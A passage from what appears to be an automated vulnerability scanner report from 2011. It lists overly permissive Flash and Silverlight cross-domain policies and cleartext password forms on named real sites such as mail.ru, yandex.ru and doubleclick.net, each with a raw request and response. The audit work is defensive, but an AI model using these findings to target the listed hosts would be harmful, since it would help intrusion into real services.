
Severity:   Low
Confidence:   Certain
Host:   http://img.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:50:50 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:50:50 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.41. http://img.imgsmail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://img.imgsmail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.imgsmail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:54:43 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:54:43 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

6.42. http://img.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://img.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:34:11 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:34:11 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...

6.43. http://js.dt00.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:24 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:40:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.44. http://mail.radar.imgsmail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.radar.imgsmail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:25:12 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>

6.45. http://mail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:24:41 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: mrcu=1AB44DB58429635EFBCAF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:41 GMT; path=/; domain=.mail.ru
Content-Length: 343
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.files.mail.ru" to-ports="80"/><allow-access-from domain="img.imgsmail.ru" to-ports="80"/><allow-access-from domain="win.mail.ru" to-ports="80"/><allow-access-from domain="e.mail.ru" to-ports="80"/>
...[SNIP]...

6.46. http://odnoklassniki.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1148-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 1148
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-from domain="odnoklassniki.ru" headers="*"/>
<allow-http-
...[SNIP]...
<allow-access-from domain="*.odnoklassniki.ru"/>
<allow-access-from domain="odnoklassniki.ua"/>
<allow-access-from domain="*.odnoklassniki.ua"/>
<allow-access-from domain="odnoklasniki.ru"/>
<allow-access-from domain="*.odnoklasniki.ru"/>
<allow-access-from domain="odnoklasniki.ua"/>
<allow-access-from domain="*.odnoklasniki.ua"/>
...[SNIP]...

6.47. http://oth.dt00.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://oth.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: oth.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

6.48. http://www.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 28 Jan 2008 18:59:12 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 214
ETag: "pve91a8585e0a42393cfbb818f11d57002"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=1da366c651cf93bce481d43030625b76ac71a41bc37e25a84db564c8; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...

6.49. http://www.livejournal.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:55 GMT
Content-Type: text/xml
Connection: close
X-AWS-Id: ws07
Set-Cookie: ljuniq=BlrhjlxYzDyERwT:1303741675:pgstats0:m0; expires=Friday, 24-Jun-2011 14:27:55 GMT; domain=.livejournal.com; path=/
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "bb0fbb-26b-49eb04f04f400"
Accept-Ranges: bytes
Content-Length: 619
X-Varnish: 1789549813
Age: 0
Via: 1.1 varnish

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://beacon.securestudies.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.4. http://pl.yumenetworks.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pl.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:49 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT
ETag: "21a082c-135-49ebc23880680"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

7.5. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 13:07:06 GMT
Expires: Tue, 26 Apr 2011 13:07:06 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 6181

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8. Cleartext submission of password  previous  next
There are 10 instances of this issue:


8.1. http://direct.yandex.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;amp;from=direct&amp;amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>

<input name="login"/>
<input name="passwd" type="password"/>
<input name="twoweeks" type="checkbox" value="yes"/>
...[SNIP]...

8.2. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...

8.3. http://mail.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">


<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" />
</td>
...[SNIP]...

8.4. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

8.5. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';        
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

8.6. http://odnoklassniki.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&amp;st.cmd=anonymLogin&amp;tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...

8.7. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
